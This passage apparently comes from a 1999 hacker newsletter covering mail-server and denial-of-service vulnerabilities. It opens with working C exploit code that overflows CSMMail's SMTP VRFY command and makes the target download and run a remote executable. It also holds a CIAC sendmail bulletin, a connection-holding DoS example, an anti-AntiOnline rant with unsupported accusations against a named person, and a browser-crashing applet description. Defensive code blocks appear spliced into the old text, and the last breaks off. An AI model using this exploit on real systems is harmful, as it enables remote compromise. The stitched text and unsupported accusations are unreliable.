             printf("        <return address> = 0x77E9A3A4\n");
             printf("Will make <target host> running CSMMail download, save, and\n");
             printf("execute http://<www site>/~pw/owned.exe\n");
       
       exit(0);
       
       }
       
       
        int main (int argc, char *argv[])
       {
         int sock,targethost,sinlen;
         struct sockaddr_in sin;
         static unsigned char buffer[20000];
         unsigned char *ptr,*ptr2;
         unsigned long ret_addr;
         int len,x = 1;
         unsigned long rw_mem;
       
       
       #ifndef UNIX
         WORD wVersionRequested;
         WSADATA wsaData;
         int err;
       
         wVersionRequested = MAKEWORD( 2, 2 );
         err = WSAStartup( wVersionRequested, &wsaData );
         if (err != 0) exit(1);
       #endif
         if (argc < 5) usages(argv[0]);
       
       
         targethost = getip(argv[1]);
       
       
          len = strlen(argv[2]);
           if (len > 60)
            {
              printf("Bad http format!\n");
              usages(argv[0]);
            }
       
           ptr = (unsigned char *)argv[2];
          while (x <= len)
             {
               x++;
               (*ptr)++;           /*Encrypt the http ip for later parsing */
               ptr++;
             }
       
          if( (sscanf(argv[3],"0x%lx", &rw_mem)) == 0)
           {
             printf("Input Error, the fixup memory address has incorrect format\n");
             exit(0);
           }
          if( (sscanf(argv[4],"0x%lx", &ret_addr)) == 0)
           {
             printf("Input error, the return address has incorrect format\n");
             exit(0);
           }
       
       
         sock = socket(AF_INET,SOCK_STREAM,0);
       
         sin.sin_family = AF_INET;
         sin.sin_addr.s_addr = targethost;
         sin.sin_port = htons(25);
         sinlen = sizeof(sin);
       
       
          printf("Starting to create the egg\n");
          ptr = buffer;
          strcpy((char *)ptr,"VRFY ");
          ptr+=5;
       
         memset((void *)ptr, 0x90, 7000);
       
         ptr2=ptr;
         ptr2+=FIXUP1;
         memcpy((void *) ptr2,(void *) &rw_mem,4);
         ptr2=ptr;
         ptr2+=FIXUP2;
         memcpy((void *) ptr2,(void *) &rw_mem,4);
       
         ptr+=OFFSET;
         memcpy ((void *) ptr,(void *)&ret_addr, 4);
         ptr+=60;
         memcpy((void *) ptr,(void *)&code,strlen(code));
       
       
          /* Adjust the two length bytes inside the shellcode for the extra data
             (web site name and directory) appended after it below. */
          ptr2 = (unsigned char *)strstr((char *)ptr,"\xb1");
          if (ptr2 == NULL)
             {
               printf("Bad shell code\n");
               exit(0);
             }
          ptr2++;
          (*ptr2)+= len + ( sizeof(dir) - 1 );
        
          ptr2 = (unsigned char *)strstr((char *)ptr,"\x83\xc6");
          if (ptr2 == NULL)
             {
               printf("Bad shell code\n");
               exit(0);
             }
        
          ptr2+= 2;
        
          (*ptr2)+= len + 8;
       
         ptr+=strlen(code);
         memcpy((void *) ptr, (void *) argv[2], len);   /*Parse in the http
         site's info */
         ptr+=len;
         memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
         printf("Made the egg\n");
       
           if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
            {
              perror("error:");
              exit(0);
            }
           printf("Connected.\n");
       
       #ifndef UNIX
               send(sock, "HELO lamer.com\r\n",16, 0);
               send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
               send(sock,"\r\n",2,0);
       #else
           write(sock, "HELO lamer.com\r\n",16);
            write(sock, &buffer, strlen((char *)&buffer) );
           write(sock,"\r\n",2);
       #endif
           SLEEP(1);
           printf("Sent the egg\n");
       #ifndef UNIX
         WSACleanup();
       #endif
           CLOSE(sock);
          exit(1);
       }
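
        The post above describes the traffic shape of the problem: a watched SMTP
        verb (HELO, MAIL FROM:, VRFY, RCPT TO:) followed by an argument far longer
        than any mailbox or host name, carrying bytes that are not printable ASCII.
        The following is an added example, not code from the post or from CSM: a
        small detector for captured or proxied SMTP command lines on the way to a
        host running an unpatched CSMMail. The 256-byte alert threshold is an
        assumption chosen to sit just under the 260-byte offset the exploit uses for
        its return address; the sample session is constructed and contains no
        shellcode.

```python
import re
from typing import List, Optional, Tuple

MAX_ARG = 256      # assumed alert threshold; the exploit above writes its return
                   # address 260 bytes into the VRFY argument (OFFSET = 260)

# Verbs the post reports as overflowable, plus EHLO/EXPN, which take the
# same kind of argument.
_CMD_RE = re.compile(rb"^(HELO|EHLO|MAIL FROM:|RCPT TO:|VRFY|EXPN)[ \t]*(.*)$", re.I | re.S)


def split_command(line: bytes) -> Optional[Tuple[str, bytes]]:
    """Return (verb, argument) for a watched SMTP command, None otherwise."""
    m = _CMD_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    return m.group(1).decode("ascii").upper(), m.group(2)


def inspect_line(line: bytes) -> Optional[dict]:
    """Alert on an overlong argument or on bytes outside printable ASCII."""
    parsed = split_command(line)
    if parsed is None:
        return None
    verb, arg = parsed
    reasons = []
    if len(arg) > MAX_ARG:
        reasons.append(f"argument is {len(arg)} bytes, limit {MAX_ARG}")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("argument contains non-printable bytes")
    if not reasons:
        return None
    return {"verb": verb, "length": len(arg), "reasons": reasons}


def scan_session(lines: List[bytes]) -> List[dict]:
    """Run inspect_line over one client's command lines and collect the alerts."""
    return [alert for alert in map(inspect_line, lines) if alert]


# Constructed sample session: a normal exchange followed by two lines shaped
# like the traffic the post describes (no real shellcode is included).
SAMPLE_SESSION = [
    b"HELO mail.example.test\r\n",
    b"MAIL FROM:<alice@example.test>\r\n",
    b"RCPT TO:<bob@example.test>\r\n",
    b"VRFY bob\r\n",
    b"VRFY " + b"A" * 400 + b"\r\n",                 # overlong, printable, no "@"
    b"RCPT TO:" + b"\x90" * 64 + b"\xff" + b"\r\n",  # short but not printable
]
```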
       
       
       @HWA       
       
  45.0  HP Sendmail 8.8.6 DoS
        ~~~~~~~~~~~~~~~~~~~~~
        
       Date: Mon, 26 Apr 1999 14:46:41 -0700 (PDT)
       From: CIAC Mail User <ciac@rumpole.llnl.gov>
       To: ciac-bulletin@rumpole.llnl.gov
       Subject: CIAC Bulletin J-040:  HP-UX Security Vulnerability in sendmail
       
       [ For Public Release ]
       
       __________________________________________________________
       
                              The U.S. Department of Energy
                           Computer Incident Advisory Capability
                                  ___  __ __    _     ___
                                 /       |     /_\   /
                                 \___  __|__  /   \  \___
                    __________________________________________________________
       
                                    INFORMATION BULLETIN
       
                           HP-UX Security Vulnerability in sendmail
       
       
       April 26, 1999 17:00 GMT                                       Number J-040
       ___________________________________________________________________________
       
       PROBLEM:       sendmail release 8.8.6 causes Denial of Service failures.
       PLATFORM:      HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00
       DAMAGE:        Users can initiate a Denial of Service.
       SOLUTION:      Apply the publicly available patches.
       ___________________________________________________________________________
       VULNERABILITY  The risk is high.  The HP bulletin states that this should be
       ASSESSMENT:    done as soon as possible.
       ___________________________________________________________________________
       
       [Start of Hewlett-Packard bulletin]
       Document ID:  HPSBUX9904-097
       Date Loaded:  19990419
             Title:  Security Vulnerability in sendmail
       
       - -------------------------------------------------------------------------
           HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00097, 20 April 1999
       - -------------------------------------------------------------------------
       
       The information in the following Security Bulletin should be acted upon
       as soon as possible.  Hewlett-Packard Company will not be liable for any
       consequences to any customer resulting from customer's failure to fully
       implement instructions in this Security Bulletin as soon as possible.
       
       - -------------------------------------------------------------------------
       PROBLEM:   sendmail release 8.8.6 causes Denial of Service failures.
       
       PLATFORM:  HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00
       
       DAMAGE:    Users can initiate a Denial of Service.
       
       SOLUTION:  Apply the patches listed below.
       
       AVAILABILITY:  All patches are available now.
       
       - -------------------------------------------------------------------------
       I.
          A. Background
             Hewlett-Packard Company HP9000 Series 700/800 systems that are
             running sendmail release 8.8.6 accept connections sub-optimally,
             which cause security problems.  Public domain fixes now in sendmail
             8.9.3 have been ported to HP-UX sendmail 8.8.6 release patch.
       
          B. Fixing the problem
              For HP-UX releases prior to 10.20, upgrade from sendmail 5.65 to
              sendmail release 8.8.6.  See www.software.hp.com
       
              For HP-UX release 10.20:   PHNE_17135;
              For HP-UX release 11.00:   PHNE_17190.
       
          C. To subscribe to automatically receive future NEW HP Security
             Bulletins or access the HP Electronic Support Center, use your
             browser to get to our ESC web page at:
       
             http://us-support.external.hp.com   (for non-European locations),
             or  http://europe-support.external.hp.com  (for Europe)
       
             Login with your user ID and password (or register for one).
             Remember to save the User ID/password assigned to you.
       
             Once you are in the Main Menu:
             To -subscribe- to future HP Security Bulletins,
               click on "Support Information Digests".
             To -review Security bulletins already released-,
               click on the "Search Technical Knowledge Database."
             To -retrieve patches-, click on "Individual Patches" and select
               appropriate release and locate with the patch identifier (ID).
             To -browse the HP Security Bulletin Archive-,  select the link at
              the bottom of the page once in the "Support Information Digests".
             To -view the Security Patch Matrix-, (updated daily) which
              categorizes security patches by platform/OS release, and by
              bulletin topic, go to the archive (above) and follow the links.
       
             The security patch matrix is also available via anonymous ftp:
             us-ffs.external.hp.com   or  ~ftp/export/patches/hp-ux_patch_matrix
       
          D. To report new security vulnerabilities, send email to
       
              security-alert@hp.com
       
             Please encrypt any exploit information using the security-alert
             PGP key, available from your local key server, or by sending a
             message with a -subject- (not body) of 'get key' (no quotes) to
             security-alert@hp.com.
       
            Permission is granted for copying and circulating this Bulletin to
            Hewlett-Packard (HP) customers (or the Internet community) for the
            purpose of alerting them to problems, if and only if, the Bulletin
            is not edited or changed in any way, is attributed to HP, and
            provided such reproduction and/or distribution is performed for
            non-commercial purposes.
       
            Any other use of this information is prohibited. HP is not liable
            for any misuse of this information by any third party.
       ________________________________________________________________________
       - -----End of Document ID:  HPSBUX9904-097-----------------------------------
        [End of Hewlett-Packard bulletin]
       
       ___________________________________________________________________________
       
       CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for
       the information contained in this bulletin.
       ___________________________________________________________________________
       
       
       CIAC, the Computer Incident Advisory Capability, is the computer
       security incident response team for the U.S. Department of Energy
       (DOE) and the emergency backup response team for the National
       Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
       National Laboratory in Livermore, California. CIAC is also a founding
       member of FIRST, the Forum of Incident Response and Security Teams, a
       global organization established to foster cooperation and coordination
       among computer security teams worldwide.
       
       CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
       can be contacted at:
           Voice:    +1 925-422-8193
           FAX:      +1 925-423-8002
           STU-III:  +1 925-423-2604
           E-mail:   ciac@llnl.gov
       
       For emergencies and off-hour assistance, DOE, DOE contractor sites,
       and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
       8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
       or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
       Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
       duty person, and the secondary PIN number, 8550074 is for the CIAC
       Project Leader.
       
       Previous CIAC notices, anti-virus software, and other information are
       available from the CIAC Computer Security Archive.
       
          World Wide Web:      http://www.ciac.org/
                                (or http://ciac.llnl.gov -- they're the same machine)
          Anonymous FTP:       ftp.ciac.org
                               (or ciac.llnl.gov -- they're the same machine)
          Modem access:        +1 (925) 423-4753 (28.8K baud)
                               +1 (925) 423-3331 (28.8K baud)
       
       CIAC has several self-subscribing mailing lists for electronic
       publications:
       1. CIAC-BULLETIN for Advisories, highest priority - time critical
          information and Bulletins, important computer security information;
       2. SPI-ANNOUNCE for official news about Security Profile Inspector
          (SPI) software updates, new features, distribution and
          availability;
       3. SPI-NOTES, for discussion of problems and solutions regarding the
          use of SPI products.
       
       Our mailing lists are managed by a public domain software package
       called Majordomo, which ignores E-mail header subject lines. To
       subscribe (add yourself) to one of our mailing lists, send the
       following request as the E-mail message body, substituting
       ciac-bulletin, spi-announce OR spi-notes for list-name:
       
       E-mail to       ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov:
               subscribe list-name
         e.g., subscribe ciac-bulletin
       
       You will receive an acknowledgment email immediately with a confirmation
       that you will need to mail back to the addresses above, as per the
       instructions in the email.  This is a partial protection to make sure
       you are really the one who asked to be signed up for the list in question.
       
        If you include the word 'help' in the body of an email to the above address,
        it will also send back an information file on how to subscribe/unsubscribe,
       get past issues of CIAC bulletins via email, etc.
       
       PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
       communities receive CIAC bulletins.  If you are not part of these
       communities, please contact your agency's response team to report
       incidents. Your agency's team will coordinate with CIAC. The Forum of
       Incident Response and Security Teams (FIRST) is a world-wide
       organization. A list of FIRST member organizations and their
       constituencies can be obtained via WWW at http://www.first.org/.
       
       This document was prepared as an account of work sponsored by an
       agency of the United States Government. Neither the United States
       Government nor the University of California nor any of their
       employees, makes any warranty, express or implied, or assumes any
       legal liability or responsibility for the accuracy, completeness, or
       usefulness of any information, apparatus, product, or process
       disclosed, or represents that its use would not infringe privately
       owned rights. Reference herein to any specific commercial products,
       process, or service by trade name, trademark, manufacturer, or
       otherwise, does not necessarily constitute or imply its endorsement,
       recommendation or favoring by the United States Government or the
       University of California. The views and opinions of authors expressed
       herein do not necessarily state or reflect those of the United States
       Government or the University of California, and shall not be used for
       advertising or product endorsement purposes.
       
       LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
       
       J-030: Microsoft BackOffice Vulnerability
       J-031: Debian Linux "Super" package Buffer Overflow
       J-032: Windows Backdoors Update II:
       J-033: SGI X Server Font Path Vulnerability
       J-034: Cisco 7xx TCP and HTTP Vulnerabilities
       J-035: Linux Blind TCP Spoofing
       J-036: LDAP Buffer overflow against Microsoft Directory Services
       J-037: W97M.Melissa Word Macro Virus
       J-038: HP-UX Vulnerabilities (hpterm, ftp)
       J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES
       
       
       
       
       
       @HWA
       
 46.0  KKI inactive connections security advisory
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Wed, 28 Apr 1999 13:59:28 +0200
       From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
       To: BUGTRAQ@netspace.org
       Subject: KKIS.28041999.002.b
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
                                 ###  ###  ###  ###  ###
                                 ### ###   ### ###   ###
                                 ######    ######    ###
                                 ### ###   ### ###   ###
                                 ###  ###  ###  ###  ###
       
                                     S E C U R I T Y
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        KKI Security Team                              Cracow Commercial Internet
        http://www.security.kki.pl                     http://www.kki.pl
        mailto:security@security.kki.pl                mailto:biuro@kki.pl
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         Report title        : Flaws in implementations of mechanisms which
                               prevent parasitic connections from being maintained
                               in many TCP network services.
         Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
         Report created by   : Robert Pajak (shadow@security.kki.pl)
                               Lukasz Luzar (lluzar@security.kki.pl)
         Report published    : 28 April 1999
         Report code         : KKIS.28041999.002.b
        Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
        Systems affected    : Linux, FreeBSD, Solaris, ...
        Archive             : http://www.security.kki.pl/advisories/
        Risk level          : low
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          The designers of many popular network services try to build mechanisms
         which should prevent parasitic connections to their programs from being
         maintained.
         The usual form of such protection is a timeout, which closes inactive
         connections.
         But some of those designers forget that a malicious user may often and
         frequently send strings full of bad or null commands to the open port
         of the service. Such a situation might happen before login/password
         authentication of the connection.
          Those programmers should implement additional mechanisms to prevent such
         situations. A good solution is to put a counter of bad (or null) commands
         inside the program.

          For example, a similar mechanism has been applied in sendmail.
         This solution is effective and very easy to implement.

          Lack of this mechanism may be quite threatening, because most of these tcp
         services run with root privileges, and bounding the number of root
         processes isn't easy when the service has no internal bound.
          That affects the whole system when the process table is filled, for
         example by multiple open connections to the vulnerable tcp service.

          The worst situation is when the vulnerable service doesn't log any
         information about a connection before authentication with login/password.
         One of the most vulnerable services is cucipop.
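         The bad-command counter the advisory recommends, as an added example in C
         (not KKI's code, nor any real popper's): a pre-authentication handler for a
         POP3-style service that spends one unit of a budget on every empty, unknown
         or failed command and closes the session once the budget is gone, so a
         client sending bare newlines every few seconds is cut off after a fixed
         number of lines instead of holding the connection indefinitely.
         MAX_BAD_CMDS, the command set and check_password() are assumptions.

```c
/* Pre-authentication bad-command budget for a POP3-style service.
 * Added example, not KKI's code nor any real popper's: MAX_BAD_CMDS, the
 * command set and check_password() are assumptions for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_BAD_CMDS 5   /* assumed: close the session after this many bad/null lines */

enum action { ACT_CONTINUE, ACT_AUTHENTICATED, ACT_DISCONNECT };

struct preauth_state {
    int  bad_cmds;    /* empty, unknown or failed commands seen before auth */
    int  have_user;   /* a USER command has been accepted */
    char user[64];
};

void preauth_init(struct preauth_state *st)
{
    memset(st, 0, sizeof *st);
}

/* Hypothetical credential check; a real server would ask its auth backend. */
static int check_password(const char *user, const char *pass)
{
    return strcmp(user, "alice") == 0 && strcmp(pass, "s3cret") == 0;
}

/* Handle one line received before authentication; the server's response is
 * written to reply. An empty line (the advisory's "\n" command) counts as bad. */
enum action preauth_handle_line(struct preauth_state *st, const char *line,
                                char *reply, size_t replylen)
{
    char buf[256], *p, *verb, *arg;

    snprintf(buf, sizeof buf, "%s", line);
    buf[strcspn(buf, "\r\n")] = '\0';            /* strip the line terminator */
    for (p = buf; *p == ' ' || *p == '\t'; p++)
        ;
    verb = p;
    for (; *p && *p != ' ' && *p != '\t'; p++)   /* upper-case the verb */
        *p = (char)toupper((unsigned char)*p);
    if (*p) {
        *p++ = '\0';
        while (*p == ' ' || *p == '\t')
            p++;
    }
    arg = *p ? p : NULL;

    if (strcmp(verb, "QUIT") == 0) {
        snprintf(reply, replylen, "+OK bye");
        return ACT_DISCONNECT;
    }
    if (strcmp(verb, "USER") == 0 && arg) {
        snprintf(st->user, sizeof st->user, "%s", arg);
        st->have_user = 1;
        snprintf(reply, replylen, "+OK");
        return ACT_CONTINUE;
    }
    if (strcmp(verb, "PASS") == 0 && arg && st->have_user &&
        check_password(st->user, arg)) {
        snprintf(reply, replylen, "+OK logged in");
        return ACT_AUTHENTICATED;
    }

    /* Anything else spends one unit of the pre-auth budget: this is the
     * counter the advisory recommends, used alongside the usual idle timeout. */
    st->bad_cmds++;
    if (st->bad_cmds >= MAX_BAD_CMDS) {
        snprintf(reply, replylen, "-ERR too many bad commands, closing");
        return ACT_DISCONNECT;
    }
    snprintf(reply, replylen, "-ERR bad command");
    return ACT_CONTINUE;
}

/* Feeds a session transcript through the handler; returns how many lines were
 * consumed before the session ended (n if it never did) and the final action. */
int run_session(const char *const *lines, int n, enum action *final)
{
    struct preauth_state st;
    char reply[80];
    int i;

    preauth_init(&st);
    *final = ACT_CONTINUE;
    for (i = 0; i < n; i++) {
        *final = preauth_handle_line(&st, lines[i], reply, sizeof reply);
        if (*final != ACT_CONTINUE)
            return i + 1;
    }
    return n;
}
```

         With MAX_BAD_CMDS set to 5, a client that only ever sends "\n" is
         disconnected on its fifth line, whatever the idle timeout is.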
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          The example below shows how to open and maintain a connection,
         which might stay open for an undefined time.
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
         --- CUT HERE ---
         /*
          *  example.c by Lukasz Luzar (lluzar@security.kki.pl)
          */

         #include <stdio.h>
         #include <stdlib.h>
         #include <unistd.h>
         #include <string.h>
         #include <strings.h>       /* bzero() */
         #include <sys/types.h>
         #include <sys/socket.h>
         #include <netinet/in.h>
         #include <netinet/tcp.h>   /* TCP_NODELAY */
         #include <arpa/inet.h>

         /* victim's address and port of service */
         #define ADDR "10.0.0.1"        //IP in dotted notation
         #define PORT 110       //e.g. some pop3
         #define DELAY 4        //(4 secs.) how often we are sending bad commands
         #define COMMAND "\n"   //some bad (or null) command

         int main(void)
         {
                int     sockfd,
                        j,k;
                struct sockaddr_in victim_addr;

                bzero((char *) &victim_addr, sizeof( victim_addr));

                victim_addr.sin_family = AF_INET;
                victim_addr.sin_addr.s_addr = inet_addr( ADDR);
                victim_addr.sin_port = htons( PORT);

                if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) {
                        fprintf( stderr, "socket error\n");
                        return 1;
                }

                if( connect( sockfd,(struct sockaddr*) &victim_addr,
                    sizeof( victim_addr)) < 0) {
                        fprintf( stderr,"connect error\n");
                        return 1;
                }

                /* send each command immediately instead of letting the stack batch them */
                k = 1;
                if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
                        fprintf( stderr,"setsockopt error\n");

                j = strlen( COMMAND);

                /* keep the unauthenticated connection alive with null commands */
                for(;;) {
                        if( write( sockfd,COMMAND,j) == -1) {
                                fprintf( stderr,"write error\n");
                                return 1;
                        }
                        fprintf( stderr,".");
                        sleep( DELAY);
                }

         }
         --- CUT HERE ---
       
       ~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Copyright (c) 1999 KKI Security Team, Poland
        All rights reserved.
       
        All questions please address to mailto:security@security.kki.pl
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       @HWA       
       
       
 47.0  How to achieve the status JP has with AntiOnline (from PacketStorm)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
       
       AntiOnline Mini-howto
       Shark Fin, ph1sh@pmc.com.au
       v1.0, 28 April 1999
       
       This document discusses the techniques used and implemented by well 
       known `media whore' John Vranesevich (aka JP). It also includes full
        details of how you too can implement such techniques to achieve the 
       same status as JP has. This document is not endorsed nor sponsored by
       AntiOnline.
       
       _____________________________________________________________________
       
       Table of Contents
       
       1. Introduction
       
               1.1 Overview
               1.2 History
               1.3 Future Revisions
               1.4 Feedback
               1.5 Copyright
               1.6 Standard Disclaimer
       
       2.  What is AntiOnline
       
       3.  Techniques used by AntiOnline
       
               3.1 The `rip'
               3.2 The `narq'
               3.3 IRC Warrior acts
               
       4.  Overview
       _____________________________________________________________________
       
       1.  Introduction
       
       
       1.1 Overview
       
       The purpose of this document is to discuss and detail the deplorable
       morals and techniques implemented by JP and the running of his 
       website. It will shed important light on the true workings of 
       AntiOnline for newcomers.
       
        This document is not endorsed nor sponsored by AntiOnline in any way.
       
       
       
       1.2 History
       
        - v1.0 Description of morals and techniques employed by AntiOnline
       
       
       1.3 Future Revisions
       
       If the deplorable and unprecedented acts of commercialism, `narqing',
        code ripping, IRC Warrior Acts, lying, plagiarism, etc. that we have
       come to expect from AntiOnline there should be future revisions of 
       this document.
       
       
       
       1.4 Feedback
       
       I welcome any feedback on this document to ph1sh@pmc.com.au,
       comments supporting or defending AntiOnline's morals are symlinked
       to /dev/null .
       
       
       
       1.5 Copyright
       
       The AntiOnline Mini-howto is copyrighted (c)1999 ph1sh
       
        (yes, you too JP)
       
       
       
       1.6 Standard Disclaimer
       
       I disavow any potential liability for the contents of this document.
       Use it at your own risk. Rest assured however that the contents of
       this document are all verified.
       
       
       
       2.  What is AntiOnline?
       
       The AntiOnline Network per-se, is a collection of sites, all ripped
       by JP (jp@antionline.com) and his side kicks. It was originally 
        developed by JP in order 'to educate the public'. However, it bemuses
       me how someone who knows so little about computer security can 
       educate a thriving online community. And as the host of the newly
       found D.o.S tool, `muerte', being the main feature of the site, I 
       also fail to see how the public is educated in any way.
       
       AntiOnline was then moved to the University of Pittsburgh, where JP
       was attending college. In time, someone at Pitt actually got a clue
       and removed the site from the College server, obviously identifying
       that the site's content and aims had nothing in common at all.
       
       AntiOnline was duly moved to a Lazerlink account where it grew in 
        retardedness unbelievably, posting ripped code and articles 
        wherever it could be done.
       
       In true JP fashion, he has recently become a commercial sell-out by
        hooking up with a couple of corporate sponsors and purchasing 
       expensive software just so he can make a neat hack attempts page.
       
       
       3.  Techniques used by AntiOnline
       
       
       3.1 The `rip'
       
        AntiOnline is notorious for publishing plagiarised material. This 
       would probably represent the true lack of knowledge attained by JP, 
       and his lack of pride and creativity.
       
       Prime examples include the Buffer Overflow special report 
       (http://www.antionline.com/SpecialReports/buffer_overflows), compare
       this to aleph1's 'smashing the stack for fun and profit' released in
       Phrack 49.
       
       More recent examples of ripping by AntiOnline, are the layout to
       AntiCode, completely ripped from freshmeat.net, and the editing
       of code to insert credits to AntiCode, in some cases removing author
       credits.
       
       Lesser examples of ripping would be in ways claiming the hacker 
       wargames as a 'product of antionline', when they were old news 
       anyway. Also, JP's special report on hacker culture was a rip from
       an article posted to attrition.org
       
       
       3.2 The `narq'
       
       Ok, JP will use you for publicity when you're going around using your
       0-day kodez to break into lots of web sites, but are you really 
       dealing with someone who is interested in protecting your privacy?
       NO. His recent reports on 'finger-printing' hackers (completely
       moronic) just go to show that he is out there to help authorities
        track you down. He is also believed to be funding Carolyn P. Meinel in 
       her efforts to track down hackers.
       
       
       3.3 IRC Warrior acts
       
       Yep, hope you've got your system patched when you're sitting on IRC
       and JP is around, ask anyone who keeps logs of his attacks for some
       proof of incessant smurf attacks etc.
       
       
       4.0 Overview
       
       Ok, I got bored of wasting my time writing about JP so I'll wrap it 
       up here. AntiOnline is a collaborative effort to rip your code and
       steal your ideas. Please help in spreading the word by posting this 
       howto wherever you can, and associating yourself with the right 
       people.
       
       JP, take your legal crap somewhere else.
       
       
       WWW: http://ph1sh.fsn.net 
       
   
   
       @HWA              
       
 48.0  Crash your browser.(JAVA)
       ~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Windows thread overrun from a Java Applet
       
            Whether you found this page by searching Yahoo, reading a newsgroup, received an e-mail, or any other way, you obviously came here for one of two
            reasons 1) you want to see what the talk is about, or 2) some "friend" of yours wanted you to get nailed by the problem. 
       
            The second reason is why I created this page. I've added this as a layer of indirection, and as a way to add information as more becomes available. In the
            interest of security, I will periodically be changing the name of the applet and the page it's on, so that not too many people have problems from direct links
       
       Background 
       
            I found this flaw as a part of some research I did beginning summer 1998, and ending December of the same. I have personally reported this security flaw on
            two occasions, and I am certain that the overseeing professor (B Clifford Neuman, ISI) reported it himself. I have held off on creating a public spectacle of
            this flaw for several months in an effort to give Sun and/or Microsoft an opportunity to correct the issue.
       
       How It Works
       
            It's rather simple, the applet simply creates more and more threads until the kernel panics. Probably the worst part is that the download is only 941 bytes,
            smaller than a normal picture. Basically that means that even running on a 28.8 modem the download is less than 1/3 of a second, and by the time most people
            would consider that there is a problem the applet is running. There is also an equivalent standard executable version, but I'm not going to discuss it here.
       
       Isn't this just a DoS (Denial of Service) attack?
       
            The debate rages on, there are some very valid points on both sides of the argument, but in the end, it doesn't really matter, this entire class of problems can
            be solved (more information)
       
       The Fix
       
             It should be rather simple for either Microsoft or Sun to fix it. The fix would consist simply of adding threadsafe thread counting to the thread spawning code,
             as well as the thread termination code. It would be most logical for Microsoft to fix the code because a standard executable does the same thing.
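        The thread-safe counting at spawn and at termination that the fix calls for,
        as an added example in C for POSIX threads (not the page author's applet, nor
        Sun's or Microsoft's runtime code): creation reserves a slot from a shared
        counter and is refused at the cap, and the slot is released only when the
        thread actually terminates, so a spawn-forever loop like the applet's is
        capped instead of exhausting the system. MAX_THREADS, counted_thread_create()
        and the blocked_worker gate used to hold threads live are assumptions.

```c
/* Thread-safe thread counting at spawn and at termination, the fix the page
 * sketches, done here for POSIX threads. Added example, not the page author's
 * applet nor any JVM vendor's code; MAX_THREADS, counted_thread_create() and
 * the blocked_worker gate are assumptions for illustration. */
#include <errno.h>
#include <pthread.h>
#include <stdatomic.h>
#include <stdlib.h>

#define MAX_THREADS 8            /* assumed cap on simultaneously live threads */
static atomic_int live_threads;  /* incremented at spawn, decremented at exit */
struct trampoline { void *(*fn)(void *); void *arg; };

/* Runs the real thread function, then releases the slot when it terminates. */
static void *trampoline_run(void *p)
{
    struct trampoline t = *(struct trampoline *)p;
    free(p);
    void *r = t.fn(t.arg);
    atomic_fetch_sub(&live_threads, 1);
    return r;
}

/* pthread_create() with a cap: the slot is reserved before the thread exists
 * and handed back on any failure, so the count cannot drift upward. */
int counted_thread_create(pthread_t *tid, void *(*fn)(void *), void *arg)
{
    struct trampoline *t;
    int rc;

    if (atomic_fetch_add(&live_threads, 1) >= MAX_THREADS) {
        atomic_fetch_sub(&live_threads, 1);
        return EAGAIN;               /* at the limit: refuse to spawn */
    }
    if ((t = malloc(sizeof *t)) == NULL) {
        atomic_fetch_sub(&live_threads, 1);
        return ENOMEM;
    }
    t->fn = fn;
    t->arg = arg;
    if ((rc = pthread_create(tid, NULL, trampoline_run, t)) != 0) {
        free(t);
        atomic_fetch_sub(&live_threads, 1);
    }
    return rc;
}

int live_thread_count(void) { return atomic_load(&live_threads); }

/* Workers block on a gate so a caller can hold them live deterministically. */
static pthread_mutex_t gate_mu = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t gate_cv = PTHREAD_COND_INITIALIZER;
static int gate_open;

static void *blocked_worker(void *arg)
{
    (void)arg;
    pthread_mutex_lock(&gate_mu);
    while (!gate_open)
        pthread_cond_wait(&gate_cv, &gate_mu);
    pthread_mutex_unlock(&gate_mu);
    return NULL;
}

static pthread_t workers[MAX_THREADS];
static int nworkers;                 /* accepted workers not yet reaped */

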